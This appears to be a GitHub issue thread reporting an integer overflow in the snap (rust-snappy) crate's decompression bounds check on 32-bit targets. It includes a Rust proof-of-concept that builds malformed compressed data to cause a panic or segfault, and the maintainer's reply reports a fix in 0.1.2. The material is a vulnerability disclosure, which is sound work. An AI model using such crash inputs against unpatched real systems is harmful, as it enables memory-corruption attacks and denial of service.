Integer overflow in bounds check on 32-bit targets

[stur]

On 64-bit there is no problem.

Cause of the bug:

rust-snappy/src/decompress.rs

Line 214 in 99e7b31

if self.s + len > self.src.len() || self.d + len > self.dst.len() {

Code to produce panic in debug mode and segfault in release mode:

extern crate snap;

fn main()
{
    let mut decoder = snap::Decoder::new();
    let corrupt_data = generate_overflowing_compressed();
    let _decompressed = decoder.decompress_vec(corrupt_data.as_slice()).unwrap();
}

fn generate_overflowing_compressed() -> Vec<u8>
{
    let mut overflowing: Vec<u8> = Vec::new();

    // Header; output size doesn't matter
    write_varu64_to_vec(&mut overflowing, 1234);

    // We need one valid literal to trigger segfault
    overflowing.push(0x00);
    overflowing.push(0x00);

    // Invalid literal with length 2^32-1
    overflowing.push(0b11_11_11_00);
    overflowing.push(0xFE); // 1 will be added to length
    overflowing.push(0xFF);
    overflowing.push(0xFF);
    overflowing.push(0xFF);

    overflowing
}

fn write_varu64_to_vec(data: &mut Vec<u8>, mut n: u64)
{
    while n >= 0b1000_0000 {
        data.push((n as u8) | 0b1000_0000);
        n >>= 7;
    }
    data.push(n as u8);
}

[BurntSushi]

Great find. I've fixed this and released it to crates.io in snap 0.1.2.